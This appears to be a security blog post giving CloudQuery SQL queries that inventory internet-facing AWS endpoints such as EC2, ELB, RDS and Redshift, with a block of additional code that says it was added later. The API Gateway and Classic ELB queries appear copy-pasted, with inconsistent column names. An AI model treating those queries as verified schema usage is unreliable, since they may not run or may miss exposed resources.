Using CloudQuery to Identify Public Network Endpoints in AWS

Queries for identifying public network endpoints

You can try creating these in the CloudQuery portal.

The queries are grouped below into resources CloudQuery supports today and resources that are not supported yet but are coming soon:

Supported Today

API Gateways

SELECT distinct id, 
                hostname, 
                ip_addresses, 
                account_id, 
                region
FROM aws_api_gateway
WHERE public_ipaddress IS NOT NULL

CloudFront Distributions

SELECT distinct domain_name, 
                account_id, 
                arn 
FROM aws_cloudfront_distributions

EC2 instances with Public IPs

SELECT DISTINCT id,
                public_dns_name,
                public_ip_address,
                account_id,
                region
FROM aws_ec2_instances
WHERE public_ip_address IS NOT NULL

ElasticSearch

-- endpoint is set for domains with a public (non-VPC) endpoint;
-- endpoints->'vpc' is set for VPC-only domains, which are not reachable
-- from the internet. Drop the second condition to list only public domains.
SELECT *
FROM aws_elasticsearch_domains
WHERE endpoint IS NOT NULL or endpoints->'vpc' IS NOT NULL;

ELB Classic

SELECT distinct id, 
                hostname, 
                ip_addresses, 
                account_id, 
                region
FROM aws_elb
WHERE public_ip_address IS NOT NULL

ELBv2

SELECT distinct name, 
                dns_name, 
                account_id, 
                region
FROM aws_elbv2_load_balancers
WHERE scheme = 'internet-facing';

EMR

-- TODO: Pending https://github.com/cloudquery/cq-provider-aws/issues/221

Redshift

-- publicly_accessible is a boolean flag, so it must be compared to true;
-- IS NOT NULL would also return every private cluster where the flag is false.
SELECT distinct id,
                endpoint_address,
                account_id,
                region
FROM aws_redshift_clusters
WHERE publicly_accessible = true

RDS

-- Same boolean flag as Redshift: compare to true, not IS NOT NULL.
SELECT DISTINCT id,
                endpoint_address,
                account_id,
                region
FROM aws_rds_instances
WHERE publicly_accessible = true
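The per-service queries above can be folded into a single view that gives one inventory of internet-reachable endpoints per account and region, which is what you want to diff from run to run or feed into an alert. This is an added example, not code from the original post or from CloudQuery; column names come from the queries on this page, except the aws_elasticsearch_domains columns (account_id, region, arn), which are assumed.

```sql
-- Added example: one consolidated view of public endpoints built from the
-- per-service queries on this page. Column names follow those queries;
-- account_id, region and arn on aws_elasticsearch_domains are assumed.
CREATE OR REPLACE VIEW public_endpoints AS
    SELECT 'ec2_instance' AS service, account_id, region, id AS resource,
           -- public_ip_address may be an inet column, so cast before COALESCE
           COALESCE(public_dns_name, public_ip_address::text) AS endpoint
    FROM aws_ec2_instances
    WHERE public_ip_address IS NOT NULL

    UNION ALL
    SELECT 'elbv2', account_id, region, name, dns_name
    FROM aws_elbv2_load_balancers
    WHERE scheme = 'internet-facing'

    UNION ALL
    -- CloudFront is a global service, so the page's query has no region column
    SELECT 'cloudfront', account_id, 'global', arn, domain_name
    FROM aws_cloudfront_distributions

    UNION ALL
    SELECT 'redshift', account_id, region, id, endpoint_address
    FROM aws_redshift_clusters
    WHERE publicly_accessible = true   -- boolean flag, not IS NOT NULL

    UNION ALL
    SELECT 'rds', account_id, region, id, endpoint_address
    FROM aws_rds_instances
    WHERE publicly_accessible = true

    UNION ALL
    -- only domains with a public endpoint; VPC-only domains are excluded
    SELECT 'elasticsearch', account_id, region, arn, endpoint
    FROM aws_elasticsearch_domains
    WHERE endpoint IS NOT NULL;

-- Full inventory, ordered so that two runs can be diffed line by line.
SELECT account_id, region, service, resource, endpoint
FROM public_endpoints
ORDER BY account_id, region, service, resource;

-- Per-account exposure summary: which accounts expose the most endpoints,
-- and through which services.
SELECT account_id, service, COUNT(*) AS public_endpoint_count
FROM public_endpoints
GROUP BY account_id, service
ORDER BY public_endpoint_count DESC, account_id, service;
```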

Not supported yet

Elastic IPs that are not attached to EC2 Instances

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

ElastiCache

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Global Accelerator

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Lightsail

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

NeptuneDB

This resource is not supported yet. For more details on this resource, see the entry in Scott Piper’s aws_exposable_resources.

Prior Art

Kinnaird McQuade
Lead Security Engineer
